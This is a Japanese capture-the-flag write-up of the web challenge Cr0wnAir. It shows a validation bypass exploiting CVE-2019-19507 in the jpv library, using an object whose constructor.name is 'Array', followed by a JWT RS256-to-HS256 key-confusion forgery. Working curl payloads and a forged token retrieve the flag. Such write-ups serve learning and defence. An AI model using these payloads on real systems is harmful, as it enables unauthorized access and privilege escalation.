2/20 - 2/22という日程で開催された。zer0ptsで参加して7位。
[Web] Cr0wnAir
jpvというライブラリによってJSONの構造がチェックされているが、package-lock.jsonを見ると2.0.1と、CVE-2019-19507という脆弱性のある古いバージョンを使っていることがわかる。
// Shape every check-in body must satisfy (checked with jpv in "strict" mode).
// Every regex is anchored with ^...$, so partial matches are rejected.
// NOTE: with jpv 2.0.1 (CVE-2019-19507, see package-lock.json) an object whose
// `constructor.name` is "Array" is accepted in place of the `extras` array, so
// the inner `sssr` pattern is never applied; the fix is upgrading jpv, not
// tightening these patterns.
const pattern = {
  firstName: /^\w{1,30}$/, // 1-30 word characters
  lastName: /^\w{1,30}$/,
  passport: /^[0-9]{9}$/, // exactly nine digits
  ffp: /^(|CA[0-9]{8})$/, // empty, or "CA" followed by eight digits
  extras: [
    { sssr: /^(BULK|UMNR|VGML)$/ }, // one of three fixed service codes
  ],
};
if (jpv.validate(data, pattern, { debug: true, mode: "strict" })) {
以下のような感じでバイパスできる。
$ node ... > jpv.validate(JSON.parse('{"firstName":"a","lastName":"b","passport":"123456789","ffp":"CA00000000","extras":[{"sssr":"FQTU"}]}'), pattern, {debug: true, mode: "strict"}) The value of ["FQTU"] does not match with [{}] false > jpv.validate(JSON.parse('{"firstName":"a","lastName":"b","passport":"123456789","ffp":"CA00000000","extras":{"constructor":{"name":"Array"},"a":{"sssr":"FQTU"}}}'), pattern, {debug: true, mode: "strict"}) true $ curl 'http://34.105.202.19:3000/checkin' -H 'Content-Type: application/json' --data-raw '{"firstName":"a","lastName":"b","passport":"123456789","ffp":"CA00000000","extras":{"constructor":{"name":"Array"},"a":{"sssr":"FQTU"}}}' {"msg":"You have successfully checked in. Thank you for being a Cr0wnAir frequent flyer. Your loyalty has been rewarded and you have been marked for an upgrade, please visit the upgrades portal.","token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJicm9uemUiLCJmZnAiOiJDQTAwMDAwMDAwIn0.NTEv7Fylr6mPFrC2Qf-YNAbq9uFS173dFvYIJuH4N_cmA8OwfDbS-_xu4h0pc3Nzob-BaqN6L06O2dtRYAu33l6KLKngp_benw8O8dQE-2ItcsXW9N5pfxmuDhid3eZwy4XStJy7kqiXHIIRaafLJJNhlQfpft3VGqqc-h7Xtkjet_HbtRBZIHN3ObqtVbAi0NqQRTaL_OM4m0l_uhF8NqFSjW9s4zz1mGXz5pjgjAu42NUk6bKoBvbNVFJ2Or_79cGYAmpFUumn3X5E69-oVN7SFxPFnjzEoOa8UHaJ3txCAEYrXvhld1YWpL7DSOIY3Yu3q8hvQ5de3ZgnOCC8Qg"}
JWTの改ざんについては、aventadorさんに「Abusing JWT public keys without the public key – Silent Signal Techblog」という記事を教えてもらい、署名に使われているRS256の公開鍵を抽出し、それをHS256の秘密鍵として署名することでできた。
$ curl -X POST 'http://34.105.202.19:3000/upgrades/flag' -H "Authorization: a eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwic3RhdHVzIjoiZ29sZCIsImlhdCI6MTUxNjIzOTAyMn0.i4zsMzI1Hxc23vkL2PQRh-zECB 49iWPqDoRUowGEneY" {"msg":"union{I_<3_JS0N_4nD_th1ngs_wr4pp3d_in_JS0N}"}